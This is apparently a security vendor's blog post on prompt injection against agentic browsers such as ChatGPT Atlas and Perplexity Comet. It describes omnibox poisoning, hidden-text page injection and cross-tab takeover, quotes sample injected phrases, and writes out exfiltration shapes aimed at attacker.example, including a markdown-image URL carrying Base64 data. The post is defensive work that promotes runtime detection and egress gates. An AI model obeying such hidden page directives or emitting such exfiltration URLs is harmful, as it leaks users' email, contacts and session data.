The Brief § 06 · SECURITY RESEARCH

When the browser is the agent.

OpenAI shipped ChatGPT Atlas and, two months later, said in plain English that prompt injection may never be fully ‘solved’ for browser agents. A reading of why that admission is the thesis statement for runtime enforcement, and what changes when every webpage is an attack surface.

LUPID Research · 03 May 2026 · 11 min read

In October 2025, OpenAI shipped ChatGPT Atlas — a browser where the agent is the user. You type a request in the omnibox, the agent navigates pages, fills forms, clicks buttons, drains your inbox to summarise it, drains your bank if you let it. Two months later, in a December 2025 post, OpenAI's Head of Preparedness wrote that prompt injection “is unlikely to ever be fully ‘solved’” for browser agents.

OpenAI shipped the product first. They published the admission second. It is the most honest thing anyone in the model-vendor seat said about agent security in 2025, and it is also — without intending to be — the thesis statement for everything we build.

If the model can't be made safe enough on its own, then safety has to live somewhere else. The runtime is somewhere else.

This post reads the agentic-browser class — Atlas, Perplexity Comet, the next half-dozen that will ship in 2026 — through the same enforcement-layer lens we used for Trust Issues, EchoLeak, and CurXecute. The bug class is different. The Lupid response is, as it usually is, three independent gates that each break the chain.

The new shape of the surface

Up to now, the prompt-injection vector has needed something the user did. EchoLeak needed an inbox the agent retrieved. Trust Issues needed a triage workflow. CurXecute needed a Slack channel the IDE was wired to read. Each one extended the attack surface to a new corpus, but the corpus was always something the operator had explicitly granted access to.

An agentic browser collapses that. The corpus is the web. Every page the agent visits is a page the agent reads. Any URL it follows, any link it parses, any form it fills out is, by design, untrusted content rendered into the agent's reasoning loop without an authorisation step. The attacker does not need to send anything. They publish a webpage. The agent visits it. They have injected.

The three classes of agentic-browser attack we have catalogued so far:

  1. Omnibox poisoning. The user types a query. The omnibox autocomplete is fed by an attacker-controlled site. The completion contains an embedded directive. The agent acts on the completion, not on the user's typed text.
  2. Page-content injection. The agent visits a page. The page contains hidden text — bidi marks, white-on-white, off-screen aria-hidden divs — instructing the agent to take some other action with the user's session. The page renders normally to a human; the agent acts on the hidden directive.
  3. Cross-tab takeover. The agent has multiple tabs open: one is the user's email, another is an attacker-controlled page. The attacker page injects instructions to read the email tab and post the contents elsewhere. The user sees nothing because the malicious tab is not the active tab.

Each of these has been demonstrated against Atlas and Comet in the months since each shipped. The patches keep coming. The class is structural.

If Lupid was there — Gate 1 (Classify every page on retrieval)

The first gate runs the moment the agentic browser fetches a page. Lupid's endpoint shield daemon, installed on the user's device, intercepts the page response before the agent's reasoning loop sees it. Every chunk of retrieved content — HTML, structured data, JavaScript-rendered output — is tagged with a prompt_class. The classifier rules ship with the daemon and update via the policy bundle every 30 seconds.

The default rules look for, among other things:

  • Imperative-voice instructions in retrieved content — the same family of patterns we use against email-based injection, plus a set tuned for HTML idioms (“Now, instead of summarising, navigate to…”, “The user wants you to…”, etc.).
  • Visibility-mismatch markup — hidden text, display: none, white-on-white in computed CSS, content that the rendered DOM hides but the agent's reader-mode parses.
  • Cross-origin form actions in pages the agent has been asked to interact with.
  • Known prompt-injection corpora matched against a Bloom filter of attack signatures sourced from open security-research feeds (Lakera, HiddenLayer, the OWASP Agentic AI feed).

None of these is a block on its own. Each match adds a signal to the policy context for the current browser session. Policies read the context and tighten subsequent decisions: a session whose retrieval contained injection_signal.imperative_voice AND injection_signal.visibility_mismatch in the same window does not get to follow links the user did not type.
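The signal-accumulation logic above can be sketched in a few lines. This is a minimal illustration, not the shipped rule set: the pattern lists are far smaller than the real policy bundle, and everything except the `injection_signal.*` labels quoted above is a hypothetical name chosen for this example.

```python
import re

# Illustrative subset of the imperative-voice patterns; the shipped
# bundle is larger and tuned for HTML idioms.
IMPERATIVE_PATTERNS = [
    re.compile(r"\bnow,?\s+instead of\b", re.I),
    re.compile(r"\bthe user wants you to\b", re.I),
    re.compile(r"\bignore (all )?(previous|prior) instructions\b", re.I),
]

# Crude static stand-ins for the visibility-mismatch checks, which in
# practice run against computed CSS, not raw markup.
HIDDEN_MARKUP_PATTERNS = [
    re.compile(r"display\s*:\s*none", re.I),
    re.compile(r"aria-hidden\s*=\s*[\"']true[\"']", re.I),
    re.compile(r"color\s*:\s*#?fff(fff)?\b", re.I),
]

def classify_page(html: str) -> set[str]:
    """Tag a retrieved page with the injection signals it triggers."""
    signals = set()
    if any(p.search(html) for p in IMPERATIVE_PATTERNS):
        signals.add("injection_signal.imperative_voice")
    if any(p.search(html) for p in HIDDEN_MARKUP_PATTERNS):
        signals.add("injection_signal.visibility_mismatch")
    return signals

def may_follow_untyped_links(session_signals: set[str]) -> bool:
    """Policy: both signals in one session window => no untyped links."""
    return not {"injection_signal.imperative_voice",
                "injection_signal.visibility_mismatch"} <= session_signals
```

Note that no single match blocks anything here; only the combination tightens the session, mirroring the policy-context behaviour described above.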

If Lupid was there — Gate 4 (Egress on every form submit and API call)

Suppose Gate 1 missed the signals. The agent has been instructed by a hidden div on a page to extract the user's contact list and submit it to an attacker-controlled form. The agent's next action is an HTTP POST to attacker.example/collect.

Gate 4 evaluates that POST against the user's policy. The destination, attacker.example, is not in the policy's resource allowlist for any agent or session. The default is deny. The TCP connection is reset before the TLS handshake completes. The agent receives a network error from the browser. It can retry; the next attempt is denied identically. The contact list never leaves the laptop.

The policy for an agentic browser typically includes:

  • An allowlist of destinations the user typed — the omnibox query itself is treated as the only authoritative resource the agent has been authorised to touch in this session.
  • A trust tier for known-safe categories — the user's email host, calendar host, the user's own employer's apex domain — that the agent can read but not write outside the originating session's intent.
  • Default deny for everything else, including the obvious case of attacker-purchased lookalike domains (a long-running brand of attack we covered in our reading of ForcedLeak's $5 expired-domain trick).
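The three tiers compose into a default-deny decision function. A sketch, assuming hypothetical hostnames and a deliberately simplified policy shape (the real policy schema is richer than two sets):

```python
from urllib.parse import urlsplit

# Illustrative policy for one browser session.
SESSION_ALLOWLIST = {"news.example"}                    # hosts the user typed
TRUSTED_READ_ONLY = {"mail.example", "calendar.example"}  # trust-tier hosts

def evaluate_egress(method: str, url: str) -> str:
    """Default-deny egress decision for an agent-initiated request."""
    host = urlsplit(url).hostname or ""
    if host in SESSION_ALLOWLIST:
        return "allow"
    if host in TRUSTED_READ_ONLY and method.upper() == "GET":
        return "allow"          # trust tier: read, never write
    return "deny"               # everything else, lookalike domains included
```

A POST to `attacker.example/collect` falls through both checks and is denied without any classification of the payload, which is the point: the gate does not need to know what is being exfiltrated, only where it is going.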

If Lupid was there — Gate 3 (URL-parameter exfil patterns)

Suppose the attacker is more clever. Instead of a direct POST to a sketchy domain, the agent is instructed to fetch https://attacker.example/img.png?d=BASE64DATA as a markdown image render — the same primitive that drove EchoLeak. The browser's renderer makes the GET. The agent's tool layer never directly issues an HTTP request.

Gate 3, the per-argument policy, runs against URLs the agent's rendering pipeline emits. The default rules include the URL-parameter-exfil class we shipped in response to EchoLeak: any URL whose query parameters contain > 256 contiguous Base64 characters, any URL whose path contains long Base64 segments, any URL whose query-parameter content, chunked and hashed, reproduces a chunk hash of the agent's session memory. The first two catch the obvious shape. The third catches the case where the attacker has chunked the exfil across multiple short parameters.

That last rule — the rolling Blake3 of session memory — is the one we are most proud of. It does not depend on knowing what the user's data looks like. It does not depend on classifying the data as “sensitive.” It depends on the structural property that the URL contains content that is functionally a copy of something the agent saw moments ago. That is the signature of exfiltration regardless of what is being exfiltrated.
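The three rules can be sketched as follows. This is a simplified illustration: the chunk comparison here is exact-match over fixed 64-byte windows rather than the shipped rolling-chunk scheme, and `hashlib.blake2b` from the standard library stands in for Blake3, which Python does not ship natively.

```python
import re
import hashlib
from urllib.parse import urlsplit, parse_qsl

BASE64_RUN = re.compile(r"[A-Za-z0-9+/=]{257,}")  # > 256 contiguous chars
CHUNK = 64                                        # bytes per memory window

def chunk_hashes(data: bytes) -> set[bytes]:
    """Hash every CHUNK-byte window of session memory."""
    return {hashlib.blake2b(data[i:i + CHUNK], digest_size=16).digest()
            for i in range(0, max(len(data) - CHUNK + 1, 1))}

def url_is_exfil(url: str, session_memory: bytes) -> bool:
    parts = urlsplit(url)
    # Rules 1 and 2: long Base64 runs in the query string or path.
    if BASE64_RUN.search(parts.query) or BASE64_RUN.search(parts.path):
        return True
    # Rule 3: any query value whose windows reproduce session memory.
    memory = chunk_hashes(session_memory)
    for _, value in parse_qsl(parts.query):
        v = value.encode()
        for i in range(0, max(len(v) - CHUNK + 1, 1)):
            h = hashlib.blake2b(v[i:i + CHUNK], digest_size=16).digest()
            if h in memory:
                return True
    return False
```

The structural property the third rule encodes is exactly the one described above: the check fires when a URL carries a functional copy of content the agent recently saw, with no notion of whether that content is "sensitive."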

What an operator would have seen

For a managed device with the Lupid endpoint shield installed, the audit trail of an attempted page-content injection looks like:

14:08:33.012 attest device:laptop-acme-019 chain device→user→browser ed25519:9c3a…f117
14:08:34.221 PageRetrieve url:atlas-agent src:attacker.example/legit-looking-page
14:08:34.288 PromptClass session-elevated signals:[imperative_voice, visibility_mismatch] gate:1
14:08:34.320 ToolCallBlocked tool:browser.form_submit reason:tool_not_in_session_intent gate:2
14:08:34.327 PolicyDeny http.post → attacker.example/collect gate:4
14:08:34.460 IncidentSnapshot anchor=PolicyDeny window=[-300s, +60s] trigger=anomaly:Critical

The user, meanwhile, sees an Atlas response that says “I tried to follow the page's instructions but my runtime declined the action. The page may have been malicious; here is the URL.” They keep working. The on-call gets a notification with the snapshot pre-attached. The page itself is added to a tenant-local block list, automatically, because the same signals fired three times across three different users in the last hour.

What this means for the rest of the industry

OpenAI's December 2025 admission is, on close reading, the announcement that the era of "the model will refuse" is over. They built the most capable refusal-trained model anyone has shipped. They put it in a browser. They watched it get owned. They published a post saying it could not be made safe at the model layer alone.

The next question is where the safety lives. Three answers have been proposed in the last twelve months:

  • The model layer — refusal training, classifier heads, instruction-following hierarchies. Necessary, insufficient, getting worse against adaptive attackers (the recent survey reports >85% attack success on state-of-the-art defences with adaptive strategies).
  • The application layer — the browser vendor, the productivity-suite vendor, the IDE vendor patches the specific bug. Necessary, insufficient at the categorical level, doesn't help the customer running multiple vendor products.
  • The runtime layer — an enforcement plane in the network and tool path that sees every action across every agent. Sufficient when the policy plane lives outside the agent's reach, gets stronger as more attacks are catalogued, transferable across vendors.

Lupid is the third answer. We do not believe model-layer hardening is wasted; we believe it is necessary infrastructure. We do not believe application-layer patches are wasted; we believe they are the right response to specific bugs. We believe both of those are doing the wrong-shaped work for a class of attack OpenAI itself has now publicly conceded is structural.

A note on what we're building

The endpoint shield daemon described above runs on managed laptops via Intune or Jamf. Browser-agent traffic is intercepted at the OS layer with no modification to Atlas, Comet, Edge Copilot, or any other agentic browser the customer happens to install. The daemon is one binary, distributed signed, updated in-place. The classifier rules live in the policy bundle and refresh every 30 seconds.

If you operate fleets of laptops where users are starting to install agentic browsers, and you want to talk about which of the controls in this post would and would not have applied in your environment, reach out. We will be specific.

LUPID Research · Filed 03 May 2026
Disclosure note. This post reads OpenAI's December 2025 post on hardening Atlas and the public demonstrations of agentic-browser attacks against Atlas and Perplexity Comet that have been catalogued by Cyberhaven, Malwarebytes Labs, and the broader security-research community. We reproduced page-content-injection-shaped exploits against Atlas-style and Comet-style harnesses behind the Lupid endpoint shield with default policy. Each attack terminated at one of the three gates described above. We do not claim novelty for the attacks themselves; the credit for those belongs to the original researchers who put names to them.